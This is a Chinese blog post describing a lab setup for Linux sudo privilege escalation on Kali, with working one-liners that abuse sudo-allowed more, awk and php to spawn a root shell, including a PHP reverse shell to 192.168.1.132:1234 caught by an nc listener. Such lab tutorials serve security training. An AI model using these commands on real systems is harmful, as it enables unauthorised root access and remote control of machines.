linux服务器 sudu提权实验环境搭建

于 2023-01-15 18:35:36 发布
阅读量166 收藏
点赞数
文章标签: linux 服务器 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nvhack/article/details/128696544
版权

参考网站:https://gtfobins.github.io/
kali linux 下etc/sudoers 文件解析

vim /etc/sudoers

在这里插入图片描述
sudo su 切换root用户
当使用sudo命令进行提权时,需要验证当前用户的密码:

一,sudo more 命令提权
修改文件 /etc/sudoers
在这里插入图片描述
在执行命令时:
在这里插入图片描述
提权方法:执行以下命令

sudo more /etc/passwd

在接着输入

!/bin/sh

提权成功,如图
在这里插入图片描述
二,sudo awk 提权
修改文件 /etc/sudoers
在这里插入图片描述
执行命令:

sudo awk 'BEGIN{system("/bin/sh")}'

提权成功
在这里插入图片描述
三,php反弹提权
先在kali下执行以下命令,重建一下软连接

rm -rf /bin/sh
ln -s /bin/bash /bin/sh

修改文件 /etc/sudoers
在这里插入图片描述
公网执行nc命令监听:

nc -lvp 1234

在这里插入图片描述
kali linux 下执行:

sudo php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/bash -i >& /dev/tcp/192.168.1.132/1234 0>&1");'

在这里插入图片描述
查看公网cmd窗口变化
在这里插入图片描述
提权成功。

必火网络安全培训学院
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux参考方法
bobo_milk的博客
11-26 1138
linux参考
Linux
qq_46258964的博客
01-07 1万+
Linux Linux一般把脚本放置在/tmp目录下,临时文化,可读写执行。 有本地用户就本地,没有就msfLinux自动化脚本利用工具 信息收集工具:LinEnum, linuxprivchecker 漏洞收集工具:linux-exploit-suggester linux-exploit-suggester2 方式如下 1,Linux SUID suid可以让调用者以文件拥有者的身份运行该文件, 所以我们就利用suid的思路就是运行root用户所拥有的suid文件
Linux————Linux下三种不同方式的技巧
Fly_鹏程万里
05-16 3890
在渗透测试或者漏洞评估的过程中,是非常重要的一步,在这一步,黑客和安全研究人员常常通过exploit,bug,错误配置来限。本文的例子都是在虚拟机里测试的,不同的虚拟机可以从Vulnhub下载。实验一:利用Linux内核漏洞VulnOS version 2是VulHub上的一个Linux练习,当打开虚拟机后,可以看到获取到低限SHELL后我们通常做下面几件事1.检测操作系统的发...
linux 笔记(3)sudo passwd 设置root用户的密码
abjb42911的博客
05-08 1万+
刚安装Ubuntu,出现在终端的首行: To run a command as administrator (user "root"), use "sudo <command>". See “man sudo_root” fordetails 译: 运行一个命令作为管理员(用户的“根”),使用“sudo <命令> 看“man sudo_root”详细内...
详细解说/etc/group /etc/passwd /etc/shadow文件
04-21 1987
Linux中,用户(User)和用户组(Group)的配置文件,是作为系统管理员的你最应该了解和掌握的系统基础文件之一。从另一方面来说,了解这些文件也是系统安全管理的重要组成部份,作为一个合格的系统管理员一定要对用户和用户组配置文件了解透彻才行;    一、用户(User)相关:   谈到用户,就不得不谈用户管理、用户配置文件、以及用户查询和管理的控制工具;用户管理主要通过修改用户配置文件完
Linux实验环境搭建
04-13
Linux 实验环境搭建详解 Linux 实验环境搭建是指在计算机上安装和配置 Linux 操作系统,以便进行实验和开发。在这个过程中,我们将详细介绍 Linux 环境搭建的步骤,包括硬件准备、操作系统安装、网络配置、分区设置...
Linux服务器搭建实验报告模板
12-27
Linux服务器搭建实验报告模板】 本实验报告主要探讨如何在Linux环境搭建FTP服务器,以便实现文件的上传和下载功能。FTP(File Transfer Protocol)是一种广泛使用的文件传输协议,它允许用户通过TCP/IP网络进行...
Linux实训课设服务器搭建实验报告
最新发布
04-03
在本篇实验报告中,我们将深入探讨如何在Linux环境搭建服务器,这是一项对于理解操作系统、网络服务和系统管理至关重要的实践。Linux作为一种开源且强大的操作系统,因其稳定性和灵活性,常被用于服务器部署。本实...
linux搭建DNS服务器实训报告
05-13
本报告将指导读者如何在 Linux 平台上搭建 DNS 服务器,并进行实训环境的配置和测试。 一、DNS 服务器介绍 DNS(Domain Name System)是 internet 上的一个分布式atabase,用于将域名解析成 IP 地址。DNS 服务器是...
Linux系统管理实验9-DHCP服务器搭建与配置.doc
06-12
Linux 系统管理实验 9 - DHCP 服务器搭建与配置旨在让学生掌握 Linux 环境下 DHCP 服务器的配置与使用。DHCP(Dynamic Host Configuration Protocol)是一种允许服务器自动分配 IP 地址给客户端的协议。在本实验中,...
sudo
weixin_34356555的博客
09-26 349
参考文献:http://zone.secevery.com/article/989https://www.anquanke.com/post/id/158511 sudo概念: sudo (Substitute User and Do 的简写)临时授,可以临时让其以root 限运行某个程序。在/etc/s...
Linux 的各种姿势总结
weixin_45116657的博客
11-21 5032
友情链接:Linux 的各种姿势总结 目录 方式总结 1、利用内核栈溢出 1.1> 信息收集 1.2> linux-exploit-suggester-2 2、明文 root 密码 3、密码复用 4、sudo 滥用 (1)su (2)awk (3)man (4)curl 5、su root 被禁止解决 6、计划任务 (1)重写pyth...
Linux之sudo
bring_coco的博客
06-09 4098
1.sudo(无密码型) 普通用户可以无密码升到管理员限 前是/etc/sudoers写了这个普通用户可以无密码执行命令 演示: 可以看到该文件配置我的普通用户hdh配置限root时不需要密码 然后我们换成root限 可以看到不用输入密码成功 2.sudo token注入 sudo cat /etc/sudoers 输入普通用户的密码 演示: 如上,将我们的普通用户无密码删除 可以看到这需要输入密码,也可以进入root限 普通用户拿着token,就拥有了root限 该过程的步骤如下
Linux思路+实战【很不错的文章】
热门推荐
大方子
10-04 2万+
Linux思路 前言 首先关于Linux我们得先明白几个概念。 linux发行版本 是我们常说的Linux操作系统,也即是由Linux内核与各种常用软件的集合产品,全球大约有数百款的Linux系统版本,每个系统版本都有自己的特性和目标人群, 例如: CentOS redhat ubuntu kali linux内核 Linux系统内核指的是一个由Linus Torvald...
Linux
weixin_44489066的博客
01-29 3401
系统漏洞总体思路:1、获取操作系统版本号;2、根据版本号搜索exp;3、反弹shell利用;4、尝试利用 1、获取系统版本号 获取发行版本 cat /etc/issue (Debian,ubuntu系列) cat /etc/*-release cat /etc/lsb-release cat /etc/redhat-release (红帽,centos系列) 获取内核版本 ca...
Linux————利用SUID
Fly_鹏程万里
05-23 2万+
bgvfdcfhjmkjnhb
Linux下利用SUID
Ms08067安全实验室
03-16 3097
今天给大家带来的是linux下的技巧。SUID是Linux的一种限机制,具有这种限的文件会在其执行时,使调用者暂时获得该文件拥有者的限。如果拥...
Linux全剧终
Ms08067安全实验室
03-11 1142
喜欢就关注我吧,订阅更多最新安全知识文章来源|MS08067 内网安全知识星球本文作者:非正常接触(Ms08067内网安全小组成员)内网纵横四海 认准Ms08067这里介绍一些Linux...
Linux系统思路
Just Do It
03-22 2万+
渗透测试过程中,拿到Webshell之后,常规都会去看一下系统是啥限。这里主要讨论Linux系统的一些思路。       常规思路不用说了,先查看Linux内核版本,然后直接去搜一下是否有关于该版本的exp放出来,如果有的话,直接编译运行即可,简单粗暴。       如果没有相关内核的exp放出来,那就需要考虑其他思路了。这篇老外的文章,介绍了常规的三种思路,第一种就是内核e
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值